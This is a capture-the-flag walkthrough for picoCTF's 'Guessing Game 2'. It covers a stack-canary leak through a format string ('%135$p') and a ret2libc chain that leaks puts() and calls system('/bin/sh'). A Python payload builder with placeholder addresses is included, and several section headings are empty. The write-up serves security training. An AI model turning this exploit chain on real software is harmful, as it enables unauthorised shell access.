PicoCTF — Guessing Game 2 Walkthrough | ret2libc, stack cookies

Prerequisite Knowledge:

Tools Used:

A word of caution:


Also, you’ll find the complete exploit script at the end of this post.

Reading through the logic:

Guessing the number:

long get_random() {
    return rand;   // no parentheses: this returns the address of rand(), not a random number
}

int do_stuff() {
    long ans = (get_random() % 4096) + 1;   // low 12 bits of &rand survive page-granular ASLR, so ans is fixed per libc
    /* ... */

Leaking the stack cookie:

; var int32_t var_ch @ ebp-0xc
0x08048783  65a114000000   mov eax, dword gs:[0x14]      ; load the canary from TLS
0x08048789  8945f4         mov dword [var_ch], eax       ; store it at ebp-0xc
0x0804878c  31c0           xor eax, eax
...
0x080487e9  8b45f4         mov eax, dword [var_ch]       ; reload the saved canary
0x080487ec  653305140000.  xor eax, dword gs:[0x14]      ; compare with TLS copy
┌─< 0x080487f3  7405           je 0x80487fa
│   0x080487f5  e816010000     call sym.__stack_chk_fail_local   ; mismatch: abort
└─> 0x080487fa  8b5dfc         mov ebx, dword [var_4h]
    0x080487fd  c9             leave
    0x080487fe  c3             ret
void win() {
    char winner[BUFSIZE];
    printf("New winner!\nName? ");
    gets(winner);       // unbounded read into a 512-byte buffer: the stack overflow
    printf("Congrats: ");
    printf(winner);     // user-controlled format string: the cookie leak
}
00:0000│ esp  0xffffcf80 ◂— 0x1
...
83:020c│      0xffffd18c ◂— 0xc552c600   // THE COOKIE (low byte is 0x00, as glibc canaries are)
86:0218│ ebp  0xffffd198 —▸ 0xffffd1b8 ◂— 0x0
/* After guessing the correct answer, use '%135$p' as your name. The pwndbg index above counts dwords from esp at the breakpoint, while printf's %n$p counts from its first vararg at call time, so the two numbers differ. */
New winner!
Name: %135$p
Congrats: 0xc552c600

Getting the EIP offset:

Making the BOF payload:

512 bytes junk + stack cookie (ebp-0xc) + 12 (0xc) bytes junk + function address (eip) + return address + function parameter/s (if any)

Leaking the address of puts():

512 bytes junk + stack cookie (ebp-0xc) + 12 (0xc) bytes junk + plt entry of puts() + address of win() + got entry of puts()

Getting the correct libc version:

Popping the shell:

512 bytes junk + stack cookie (ebp-0xc) + 12 (0xc) bytes junk + address of system() + any return address + address of "/bin/sh"
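The three stages above (leak the cookie, leak puts() through the PLT to find libc, return into system()) share one stack layout, so they can be built by a single helper. The block below is an added example, not the post's own exploit script: it uses only the standard library so it runs offline, and every address in it (PLT/GOT entries, the win() address, the libc offsets, the leaked values) is a made-up placeholder that must be replaced with values from your binary and the libc you identified. It also adds two checks a practitioner wants before sending anything: the leaked cookie must end in a 0x00 byte (glibc canary), the computed libc base must be page aligned, and no payload may contain a newline, since gets() would stop reading there.

```python
"""Payload builder for the Guessing Game 2 ret2libc chain (added example)."""
import re
import struct

BUFSIZE = 512        # char winner[BUFSIZE] in win()
COOKIE_TO_EIP = 12   # ebp-0xc cookie, then 4 junk + saved ebx + saved ebp before the return address

# Placeholder addresses (assumptions, NOT the real challenge values).
PUTS_PLT = 0x08048500
PUTS_GOT = 0x0804A018
WIN_ADDR = 0x08048700
# Placeholder libc offsets (assumptions): take the real ones from the matched libc.
PUTS_OFF = 0x5F140
SYSTEM_OFF = 0x3A940
BINSH_OFF = 0x15902B


def p32(value):
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    return struct.unpack("<I", data[:4])[0]


def parse_cookie(congrats_line):
    """Extract the canary from 'Congrats: 0x....' printed by the %135$p name."""
    match = re.search(r"Congrats:\s*(0x[0-9a-fA-F]+)", congrats_line)
    if not match:
        raise ValueError("no hex value after 'Congrats:'")
    cookie = int(match.group(1), 16)
    if cookie & 0xFF != 0:
        raise ValueError("low byte is not 0x00; wrong %n$p offset?")
    return cookie


def build_payload(cookie, func, ret, args=()):
    """512 junk + cookie + 12 junk + function + return address + arguments."""
    payload = b"A" * BUFSIZE + p32(cookie) + b"B" * COOKIE_TO_EIP + p32(func) + p32(ret)
    for arg in args:
        payload += p32(arg)
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would truncate it")
    return payload


def leak_payload(cookie):
    """puts(puts@got) then return to win() so the process stays alive."""
    return build_payload(cookie, PUTS_PLT, WIN_ADDR, (PUTS_GOT,))


def parse_leaked_puts(raw_output):
    """First four bytes printed by puts() are the little-endian puts() address."""
    return u32(raw_output)


def libc_base(leaked_puts, puts_off=PUTS_OFF):
    base = leaked_puts - puts_off
    if base & 0xFFF:
        raise ValueError("libc base not page aligned; wrong libc version?")
    return base


def shell_payload(cookie, base):
    """system("/bin/sh"); the return address after system() does not matter."""
    return build_payload(cookie, base + SYSTEM_OFF, 0xDEADBEEF, (base + BINSH_OFF,))


def expected_guess(rand_addr):
    """get_random() returns &rand, so the answer is its low 12 bits plus one."""
    return (rand_addr % 4096) + 1


if __name__ == "__main__":
    cookie = parse_cookie("Congrats: 0xc552c600")          # value from the walkthrough
    stage1 = leak_payload(cookie)
    leaked = parse_leaked_puts(p32(0xF7E00000 + PUTS_OFF))  # constructed leak
    base = libc_base(leaked)
    stage2 = shell_payload(cookie, base)
    print(hex(cookie), len(stage1), hex(base), len(stage2))
```

In a live run the two stages are sent as the name after winning the guess twice: the first answer the leak, the second answer the shell, with win() re-entered in between because stage 1 returns into it.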

The complete exploit:


OSCP enthusiast | A curious, ‘amateur’, budding ethical hacker
